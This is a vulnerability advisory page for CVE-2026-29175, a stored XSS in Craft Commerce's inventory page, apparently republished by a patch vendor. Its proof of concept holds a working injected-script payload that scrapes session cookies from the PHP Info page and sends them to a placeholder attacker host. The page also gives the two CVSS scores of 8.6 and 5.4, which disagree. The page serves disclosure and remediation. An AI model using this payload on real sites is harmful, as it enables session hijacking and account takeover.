Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2026-29175

Craft Commerce has multiple Stored XSS in Commerce Inventory Page, Leading to Session Hijacking
Back to all
CVE

CVE-2026-29175

Craft Commerce has multiple Stored XSS in Commerce Inventory Page, Leading to Session Hijacking

Summary

Stored XSS vulnerabilities exist in the Commerce Inventory page. The Product TitleVariant Title, and Variant SKU fields are rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript when any user (including administrators) views the inventory management page.

This vulnerability enables session hijacking by fetching the PHP Info utility page, which displays unmasked session cookies. Unlike other XSS chains that require elevated sessions, this attack provides instant access to the victim’s session - no additional user interaction or elevated session approval required.

Proof of Concept

Permissions Required

  • Access the control panel
  • Access Craft Commerce
  • Create/Edit products

Steps to Reproduce

  1. Log in to the control panel
  2. Navigate to Commerce → Products
  3. Add a new product and set the Title field to: (replace https://attacker.com)

    ```html

    <img src=x onerror="fetch('/admin/utilities/php-info').then(r=>r.text()).then(t=>{m=t.match(/<th[^>]>Cookie[^<]</th>\s<td[^>]>([\s\S]*?)</td>/);if(m)new Image().src='https://attacker.com/s?c='+btoa(m[1])})">

    ```

  1. Save the product
  2. Navigate to Commerce → Inventory (/admin/commerce/inventory)
  3. XSS executes, fetches PHP Info page, extracts session cookies, and exfiltrates them to the attacker server

Cookie Extraction Details

The PHP Info page (/admin/utilities/php-info) displays cookie values (unmasked) in multiple locations:

  • HTTP_COOKIE
  • Cookie (used in this PoC)
  • $SERVER['HTTPCOOKIE']
  • $_COOKIE['<cookie-name>']

Notes

  • The same vulnerability exists in Variant Title and Variant SKU fields while creating a product. The PoC focuses on Product Title, but the same attack works for the other two fields.
  • $COOKIE['CRAFTCSRF_TOKEN'] is masked in PHP Info, but the unmasked value is available in the other parameters listed above.
  • This vulnerability can also be chained to achieve full database exfiltration or do it after hijacking an administrator session.

Mitigation

  1. Sanitize product and variant fields when rendering in the inventory template
  2. Mask sensitive cookie values in the PHP Info utility page (similar to how CRAFTCSRFTOKENCRAFTSECURITYKEY, and CRAFTDBPASSWORD are already masked)

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
8.6
-
4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
C
H
U
0
-
C
H
U
-

Related Resources

No items found.

References

https://github.com/craftcms/commerce/security/advisories/GHSA-cfpv-rmpf-f624, https://nvd.nist.gov/vuln/detail/CVE-2026-29175, https://github.com/craftcms/commerce/commit/9f0638a4fb29ed8295a463385a7cc49ec986e33a, https://github.com/craftcms/commerce

Severity

5.4

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
5.4
EPSS Probability
0.00012%
EPSS Percentile
0.01852%
Introduced Version
5.0.0
Fix Available
5.5.3

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading